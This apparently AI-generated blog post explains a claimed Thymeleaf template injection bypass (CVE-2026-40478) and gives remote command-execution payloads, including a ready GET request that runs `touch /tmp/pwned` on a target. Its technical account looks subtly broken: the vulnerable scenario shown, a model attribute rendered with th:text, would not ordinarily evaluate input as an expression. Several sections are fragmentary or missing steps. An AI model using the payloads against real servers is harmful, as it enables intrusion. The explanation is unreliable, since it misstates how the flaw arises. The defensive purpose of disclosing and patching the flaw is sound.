CVE-2026-40478 - Breaking Down The Thymeleaf SSTI Security Bypass Vulnerability (With Code & Exploit Details)

On April 2026, a new vulnerability was published for Thymeleaf, a popular Java template engine used by thousands of web applications: CVE-2026-40478. This issue allows attackers to bypass Thymeleaf’s server-side expression injection protections and potentially execute unauthorized server-side code—all without any authentication.

In this article, you’ll find a clear explanation of how this flaw works, code samples, pointers to official sources, and demonstration of how an attacker could exploit it. Understanding this helps you assess your own risk and protect your apps.

What is Thymeleaf and Why Does This Matter?

Thymeleaf is a popular Java-based template engine used both for web and standalone apps. Developers use it to generate HTML, email, and text by embedding values and logic in templates. It’s the engine behind countless Spring Boot apps.

The Problem: When apps pass unsanitized user input directly to templates, attackers can sometimes inject server-side expressions. Thymeleaf offered protections against this, but versions up to 3.1.3.RELEASE didn’t block some clever bypass patterns.

Technical Details

This vulnerability exists because Thymeleaf’s “expression execution mechanisms”—the parts that evaluate dynamic th:* attributes, literal expressions, and inlined Java—fail to properly block certain syntax. This opens the door for Server-Side Template Injection (SSTI), even if developers think they’re protected.

Vulnerable versions:
* <= 3.1.3.RELEASE

Fixed in:
* 3.1.4.RELEASE

If a developer takes user input and passes it to Thymeleaf for evaluation (for example, as a model attribute, or dynamic attribute), an attacker can craft input that is treated as an expression—even when the developer intends it be just text.

Suppose a developer writes this snippet in their controller, naively trusting user input

@GetMapping("/hello")
public String hello(@RequestParam("name") String name, Model model) {
    model.addAttribute("username", name); // user controls username
    return "hello";
}

And in the Thymeleaf template (hello.html)

<p th:text="${username}"></p>

Even with protections enabled, a user could send malicious input as the name parameter. For example:

http://example.com/hello?name=${T(java.lang.Runtime).getRuntime().exec('id')}

While Thymeleaf tries to block dangerous expressions like T(Runtime), the flaw in 3.1.3.RELEASE and before allows specific patterns to sneak through, especially with obfuscated or partially encoded input, or by abusing overlooked escape rules.

Send a crafted GET request

GET /hello?name=%24%7BT(java.lang.Runtime).getRuntime().exec('touch%20/tmp/pwned')%7D HTTP/1.1
Host: victim-app

*(That’s ${T(java.lang.Runtime).getRuntime().exec('touch /tmp/pwned')} URL-encoded)*

2. Template Processing

Thymeleaf in vulnerable versions fails to sanitize this, interprets it as an expression, and executes the Java code (in this case, creates /tmp/pwned on the server).

Always treat user input as untrusted! Instead of this (vulnerable)

model.addAttribute("username", userInput);

Use Thymeleaf’s th:utext very carefully, only for safe HTML, and never allow untrusted user input into expressions or attribute names.

References & Resources

- Official CVE Record: CVE-2026-40478
- Thymeleaf Changelog 3.1.4.RELEASE
- OWASP: Template Injection
- Thymeleaf Docs: Expression Basic Objects

org.thymeleaf
thymeleaf
3.1.4.RELEASE

NEVER Pass User Input Directly to Expressions:

Always validate and sanitize user input. Don’t use dynamic expressions unless you fully control the values.

Sanitize Inputs:

Consider using libraries to sanitize or strip potentially malicious input before reaching your templates.

Summary

CVE-2026-40478 is a serious security bypass in Thymeleaf’s expression evaluation, enabling unauthenticated SSTI if you pass untrusted inputs into templates. While updating Thymeleaf to 3.1.4.RELEASE closes the door, it’s essential to understand the risks and treat all user input as dangerous in template logic.

Patch now, audit your code, and always protect your users by following secure coding best practices.


*Exclusive content by AI. For learning only. Always verify and test in your own environment. Stay safe!*

Timeline

Published on: 04/17/2026 21:57:01 UTC
Last modified on: 04/17/2026 22:16:33 UTC